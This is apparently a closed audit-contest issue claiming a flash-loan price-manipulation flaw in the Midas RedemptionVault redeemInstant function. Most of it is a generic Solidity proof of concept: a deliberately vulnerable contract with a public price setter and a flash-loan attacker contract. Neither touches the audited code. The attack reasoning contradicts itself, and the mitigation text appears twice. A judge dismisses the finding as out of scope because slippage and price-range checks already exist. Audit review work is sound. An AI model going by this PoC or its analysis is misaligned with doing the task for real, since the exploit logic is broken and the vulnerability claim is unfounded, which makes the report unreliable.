search

sherlock-audit / 2024-08-midas-minter-redeemer-judging

1 stars 1 forks source link

admin - No Protection Against Flash Loan Attacks at redeemInstnt function for RedemptionVault contract #4

Closed sherlock-admin3 closed 1 month ago

sherlock-admin3 commented 1 month ago

admin

High

No Protection Against Flash Loan Attacks at redeemInstnt function for RedemptionVault contract

Summary

Line: https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/RedemptionVault.sol#L124 The contract does not have explicit protections against flash loan attacks, which could allow an attacker to manipulate token prices or exploit the rate conversion logic within a single transaction.

Root Cause

Price manipulation

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

No response

Impact

Attacker can manipulate token prices or exploit the rate conversion logic within a single transaction.

PoC

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IFlashLoanProvider {
    function flashLoan(uint256 amount) external;
}

interface IToken {
    function transfer(address recipient, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

contract VulnerableContract {
    IToken public token;
    uint256 public price; // price of the token in some base currency, e.g., USD

    constructor(IToken _token, uint256 _price) {
        token = _token;
        price = _price;
    }

    function buyToken(uint256 amount) external payable {
        require(msg.value >= amount * price, "Not enough Ether sent");
        token.transfer(msg.sender, amount);
    }

    function updatePrice(uint256 newPrice) external {
        // Assume this function is publicly callable and price is based on an oracle
        price = newPrice;
    }
}
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./VulnerableContract.sol";

contract FlashLoanAttacker {
    IFlashLoanProvider public flashLoanProvider;
    VulnerableContract public vulnerableContract;
    IToken public token;
    uint256 public amountBorrowed;

    constructor(
        IFlashLoanProvider _flashLoanProvider,
        VulnerableContract _vulnerableContract,
        IToken _token
    ) {
        flashLoanProvider = _flashLoanProvider;
        vulnerableContract = _vulnerableContract;
        token = _token;
    }

    function executeFlashLoan(uint256 amount) external {
        amountBorrowed = amount;
        flashLoanProvider.flashLoan(amount);
    }

    function receiveFlashLoan(uint256 amount) external {
        // Manipulate the price in the vulnerable contract
        uint256 inflatedPrice = 1000; // Assume we inflate the price by 1000x
        vulnerableContract.updatePrice(inflatedPrice);

        // Exploit the inflated price to buy tokens at a lower actual value
        uint256 amountToBuy = amount / inflatedPrice;
        vulnerableContract.buyToken{value: msg.value}(amountToBuy);

        // Restore the price to avoid detection
        uint256 normalPrice = 1; // Assume this is the normal price
        vulnerableContract.updatePrice(normalPrice);

        // Repay the flash loan
        token.transfer(address(flashLoanProvider), amount);
    }

    receive() external payable {}
}

Deploy VulnerableContract with a normal price of 1 unit. Deploy FlashLoanAttacker with references to the flash loan provider, the vulnerable contract, and the token contract. Execute the executeFlashLoan function on the FlashLoanAttacker contract, which will: Borrow tokens via a flash loan. Manipulate the price in the vulnerable contract. Buy tokens at the manipulated price. Repay the flash loan. Profit from the price difference. Summary of the Attack Flow The attacker borrows tokens through a flash loan. The attacker inflates the price of the token in the VulnerableContract by manipulating the oracle. The attacker buys a large amount of tokens at the manipulated price. The attacker then resets the price to its original value. The attacker repays the flash loan and profits from the difference in token value.

Security Mitigations: The primary defense against such attacks involves using a reliable oracle that cannot be easily manipulated within a single transaction (e.g., time-weighted average price oracles). Practical Implementation: In a real-world scenario, this would require integration with existing flash loan providers like Aave, dYdX, or Uniswap, and using actual token contracts.

Mitigation

Security Mitigations: The primary defense against such attacks involves using a reliable oracle that cannot be easily manipulated within a single transaction (e.g., time-weighted average price oracles). Practical Implementation: In a real-world scenario, this would require integration with existing flash loan providers like Aave, dYdX, or Uniswap, and using actual token contracts.

sherlock-admin3 commented 1 month ago

1 comment(s) were left on this issue during the judging contest.

merlinboii commented:

OOS. The function already introduce the slipage check for redeemInstant and the price data fee has the min/max acceptable range checks